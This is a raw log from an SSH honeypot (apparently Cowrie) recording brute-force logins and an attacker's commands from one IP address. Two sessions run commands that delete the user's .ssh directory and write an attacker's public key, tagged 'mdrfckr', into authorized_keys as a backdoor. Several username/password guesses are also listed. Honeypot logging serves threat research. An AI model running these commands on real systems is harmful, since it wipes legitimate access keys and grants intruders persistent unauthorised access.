{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:52:12.343973Z","src_ip":"212.227.235.229","session":"cc0000f9052d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:52:14.111347Z","src_ip":"212.227.235.229","session":"cc0000f9052d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:14.743396Z","src_ip":"212.227.235.229","session":"cc0000f9052d"}
{"eventid":"cowrie.session.closed","duration":"14.6","message":"Connection lost after 14.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:14.943232Z","src_ip":"212.227.235.229","session":"8509a8a7f853"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37418,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a2da5576ff4","protocol":"ssh","message":"New connection: 212.227.235.229:37418 (1.2.3.4:22) [session: 5a2da5576ff4]","sensor":"my-vps","timestamp":"2025-09-09T01:52:26.824499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:52:26.825647Z","src_ip":"212.227.235.229","session":"5a2da5576ff4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:52:26.933953Z","src_ip":"212.227.235.229","session":"5a2da5576ff4"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123321","message":"login attempt [root/Aa123321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:52:27.406654Z","src_ip":"212.227.235.229","session":"5a2da5576ff4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:52:27.676081Z","src_ip":"212.227.235.229","session":"5a2da5576ff4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:52:27.676797Z","src_ip":"212.227.235.229","session":"5a2da5576ff4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:52:27.677859Z","src_ip":"212.227.235.229","session":"5a2da5576ff4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:27.787452Z","src_ip":"212.227.235.229","session":"5a2da5576ff4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:52:28.021391Z","src_ip":"212.227.235.229","session":"5a2da5576ff4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:52:28.022145Z","src_ip":"212.227.235.229","session":"5a2da5576ff4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:52:28.132030Z","src_ip":"212.227.235.229","session":"5a2da5576ff4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:28.133033Z","src_ip":"212.227.235.229","session":"5a2da5576ff4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54628,"dst_ip":"1.2.3.4","dst_port":22,"session":"390f793ddea4","protocol":"ssh","message":"New connection: 212.227.235.229:54628 (1.2.3.4:22) [session: 390f793ddea4]","sensor":"my-vps","timestamp":"2025-09-09T01:52:36.299036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:52:36.300134Z","src_ip":"212.227.235.229","session":"390f793ddea4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:52:36.409928Z","src_ip":"212.227.235.229","session":"390f793ddea4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:52:36.890955Z","src_ip":"212.227.235.229","session":"390f793ddea4"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:37.001475Z","src_ip":"212.227.235.229","session":"5a2da5576ff4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:37.003780Z","src_ip":"212.227.235.229","session":"390f793ddea4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51426,"dst_ip":"1.2.3.4","dst_port":22,"session":"b86135d234fa","protocol":"ssh","message":"New connection: 212.227.235.229:51426 (1.2.3.4:22) [session: b86135d234fa]","sensor":"my-vps","timestamp":"2025-09-09T01:52:41.081137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:52:41.081867Z","src_ip":"212.227.235.229","session":"b86135d234fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:52:41.323104Z","src_ip":"212.227.235.229","session":"b86135d234fa"}
{"eventid":"cowrie.login.failed","username":"butter","password":"12345","message":"login attempt [butter/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T01:52:42.332225Z","src_ip":"212.227.235.229","session":"b86135d234fa"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:43.576287Z","src_ip":"212.227.235.229","session":"b86135d234fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35502,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3f2e74ef1bc","protocol":"ssh","message":"New connection: 212.227.235.229:35502 (1.2.3.4:22) [session: f3f2e74ef1bc]","sensor":"my-vps","timestamp":"2025-09-09T01:52:50.930383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:52:50.931212Z","src_ip":"212.227.235.229","session":"f3f2e74ef1bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:52:51.014793Z","src_ip":"212.227.235.229","session":"f3f2e74ef1bc"}
{"eventid":"cowrie.login.failed","username":"user1","password":"P@ssw0rd","message":"login attempt [user1/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T01:52:51.388333Z","src_ip":"212.227.235.229","session":"f3f2e74ef1bc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:52.474364Z","src_ip":"212.227.235.229","session":"f3f2e74ef1bc"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50712,"dst_ip":"1.2.3.4","dst_port":22,"session":"31df7cfdbbba","protocol":"ssh","message":"New connection: 217.72.205.35:50712 (1.2.3.4:22) [session: 31df7cfdbbba]","sensor":"my-vps","timestamp":"2025-09-09T01:52:56.210081Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:56.211292Z","src_ip":"217.72.205.35","session":"31df7cfdbbba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48668,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a53a63f848d","protocol":"ssh","message":"New connection: 212.227.235.229:48668 (1.2.3.4:22) [session: 8a53a63f848d]","sensor":"my-vps","timestamp":"2025-09-09T01:53:05.256524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:53:05.257471Z","src_ip":"212.227.235.229","session":"8a53a63f848d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:53:05.518358Z","src_ip":"212.227.235.229","session":"8a53a63f848d"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@Password","message":"login attempt [root/Admin@Password] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:53:06.610104Z","src_ip":"212.227.235.229","session":"8a53a63f848d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:53:07.180411Z","src_ip":"212.227.235.229","session":"8a53a63f848d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:53:07.181193Z","src_ip":"212.227.235.229","session":"8a53a63f848d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:53:07.181979Z","src_ip":"212.227.235.229","session":"8a53a63f848d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:53:07.443520Z","src_ip":"212.227.235.229","session":"8a53a63f848d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:53:07.983307Z","src_ip":"212.227.235.229","session":"8a53a63f848d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:53:07.983987Z","src_ip":"212.227.235.229","session":"8a53a63f848d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:53:08.247045Z","src_ip":"212.227.235.229","session":"8a53a63f848d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:53:08.247951Z","src_ip":"212.227.235.229","session":"8a53a63f848d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49774,"dst_ip":"1.2.3.4","dst_port":22,"session":"c525d8b5bb09","protocol":"ssh","message":"New connection: 212.227.235.229:49774 (1.2.3.4:22) [session: c525d8b5bb09]","sensor":"my-vps","timestamp":"2025-09-09T01:53:08.521078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:53:08.522016Z","src_ip":"212.227.235.229","session":"c525d8b5bb09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:53:08.788475Z","src_ip":"212.227.235.229","session":"c525d8b5bb09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58512,"dst_ip":"1.2.3.4","dst_port":22,"session":"91fe48ae1740","protocol":"ssh","message":"New connection: 212.227.235.229:58512 (1.2.3.4:22) [session: 91fe48ae1740]","sensor":"my-vps","timestamp":"2025-09-09T01:53:08.861964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:53:08.862754Z","src_ip":"212.227.235.229","session":"91fe48ae1740"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60394,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb724044c279","protocol":"ssh","message":"New connection: 212.227.235.229:60394 (1.2.3.4:22) [session: eb724044c279]","sensor":"my-vps","timestamp":"2025-09-09T01:53:09.090011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:53:09.092833Z","src_ip":"212.227.235.229","session":"eb724044c279"}
